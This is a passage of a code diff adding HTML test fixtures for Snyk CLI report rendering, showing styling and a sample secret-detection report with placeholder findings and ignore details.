+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+</head>
+<body><header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 C31.928,34.441 33.212,34.835 34.737,34.835 C38.703,34.835 41.359,31.627 43.215,26.885 L49.443,11.108 L44.132,11.108 L44.13,11.11 Z"/>
+          </g>
+        </svg>
+      </a>
+      <div class="test-meta"><p class="timestamp">December 12, 2025 09:07 UTC</p></div>
+    </div>
+    <h1>Snyk Test Report</h1>
+  </div>
+</header>
+<main>
+<div class="container"><div class="project-summary">
+  <div class="summary-meta">
+    <span class="meta-label">Organization</span><span class="meta-value">My Org</span>
+    <span class="meta-label">Test type</span><span class="meta-value">Secret Detection</span>
+  </div>
+  <div class="summary-counts">
+    <span class="summary-label">Open issues: 2</span>
+    <span class="severity-badge" style="background:#AB1A1A">1 CRITICAL</span>
+    <span class="severity-badge" style="background:#CE5019">1 HIGH</span>
+    <span class="severity-badge severity-badge--zero">0 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+    <span class="summary-label ignored-label">Ignored issues: 1</span>
+    <span class="severity-badge severity-badge--zero">0 CRITICAL</span>
+    <span class="severity-badge severity-badge--ignored" style="background:#CE5019">1 HIGH</span>
+    <span class="severity-badge severity-badge--zero">0 MEDIUM</span>
+    <span class="severity-badge severity-badge--zero">0 LOW</span>
+  </div>
+</div><section class="result-section">
+    <details class="finding-type-section" open>
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Open Secrets Issues (2)</h2></summary>
+      <div class="issue-card severity--critical">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#AB1A1A">C</div>
+      <h3>Generic Secret</h3>
+      <span class="ignored-badge">Pending Ignore</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">bbbbbbbb-bbbb-cccc-dddd-eeeeeeeeeeee</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--critical">
+      <div class="issue-description"><p>Do not hardcode passwords or other secrets directly in the source code. Use a secure secret management system instead.</p></div>
+      <div class="file-location">Found in: <strong>aws_keys.txt, line 4</strong></div>
+    </div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> September 09, 2027</div>
+    <div class="ignore-detail"><span class="ignore-label">Category:</span> wont-fix</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored on:</span> February 05, 2026</div>
+    <div class="ignore-detail"><span class="ignore-label">Ignored by:</span> Someone</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> Someone is ignoring this</div>
+  </div>
+</div>
+      <div class="issue-card severity--high">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic API Key</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">99999999-8888-7777-6665-000000000000</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Do not hardcode passwords or other secrets directly in the source code. Use a secure secret management system instead.</p></div>
+      <div class="file-location">Found in: <strong>config.env, line 3 to 44</strong></div>
+    </div>
+  </div>
+</div>
+    </details>
+    <details class="finding-type-section">
+      <summary><h2 class="finding-type-header"><svg class="chevron" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><path d="M6 3l5 5-5 5z"/></svg>Ignored Secrets Issues (1)</h2></summary>
+      <div class="issue-card severity--high ignored">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#CE5019">H</div>
+      <h3>Generic API Key</h3>
+      <span class="ignored-badge">Ignored</span>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">99999999-8888-7777-6666-000000000000</li>
+      <li class="card-meta-item">CWE-798</li>
+      <li class="card-meta-item">Secrets</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="issue-summary severity--high">
+      <div class="issue-description"><p>Do not hardcode passwords or other secrets directly in the source code. Use a secure secret management system instead.</p></div>
+      <div class="file-location">Found in: <strong>config.env, line 3 to 44</strong></div>
+    </div>
+  </div>
+  <div class="ignore-details">
+    <div class="ignore-detail"><span class="ignore-label">Expiration:</span> Does not expire</div>
+    <div class="ignore-detail"><span class="ignore-label">Reason:</span> License issue</div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+</main>
+</body>
+</html>

--- a/internal/presenters/testdata/ufm/secrets.with-report.html
+++ b/internal/presenters/testdata/ufm/secrets.with-report.html
@@ -1,0 +1,294 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="description" content="4 open issues, 1 ignored.">
+<title>Snyk Test Report</title><style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
+@media print{.report-header,.card-tab-bar{display:none}.fix-analysis,.dataflow{display:block !important}.issue-card .card-section{background:none}.marker{border:1px solid #555;background:transparent}.project-summary{border-left-color:#000;border-left-width:3px;box-shadow:none}.project-summary .severity-badge{border:1px solid #999;color:#000;background:transparent !important}}
+</style>
+</head>
+<body><header class="report-header">
+  <div class="header-inner">
+    <div class="header-top">
+      <a class="brand" href="https://snyk.io" title="Snyk - Open Source Security" target="_blank" rel="noopener noreferrer">
+        <svg width="68" height="35" viewBox="0 0 68 35" xmlns="http://www.w3.org/2000/svg" role="img" aria-label="Snyk logo">
+          <g fill="#fff" fill-rule="evenodd">
+            <path d="M5.732,27.278 C3.445,27.278 1.589,26.885 0,26.124 L0.483,22.472 C2.163,23.296 4.056,23.689 5.643,23.689 C6.801,23.689 7.563,23.295 7.563,22.599 C7.563,20.594 0.333,21.076 0.333,15.839 C0.333,12.491 3.407,10.729 7.259,10.729 C9.179,10.729 11.161,11.249 12.444,11.704 L11.924,15.294 C10.577,14.774 8.747,14.291 7.222,14.291 C6.282,14.291 5.518,14.621 5.518,15.231 C5.518,17.208 12.903,16.815 12.903,21.925 C12.903,25.325 9.877,27.277 5.733,27.277 L5.732,27.278 Z M25.726,26.936 L25.726,17.894 C25.726,15.827 24.811,14.85 23.069,14.85 C22.219,14.85 21.329,15.09 20.719,15.46 L20.719,26.936 L15.352,26.936 L15.352,11.262 L20.602,10.83 L20.474,13.392 L20.652,13.392 C21.784,11.87 23.702,10.716 25.992,10.716 C28.736,10.716 31.112,12.416 31.112,16.436 L31.112,26.936 L25.724,26.936 L25.726,26.936 Z M61.175,26.936 L56.879,19.479 L56.446,19.479 L56.446,26.935 L51.082,26.935 L51.082,8.37 L56.447,0 L56.447,17.323 C57.515,16.017 61.112,11.059 61.112,11.059 L67.732,11.059 L61.454,17.689 L67.949,26.95 L61.175,26.95 L61.175,26.938 L61.175,26.936 Z M44.13,11.11 L41.93,18.262 C41.5,19.606 41.08,22.079 41.08,22.079 C41.08,22.079 40.75,19.516 40.292,18.172 L37.94,11.108 L31.928,11.108 L38.462,26.935 C37.572,29.04 36.199,30.815 34.369,30.815 C34.039,30.815 33.709,30.802 33.389,30.765 L31.255,34.061 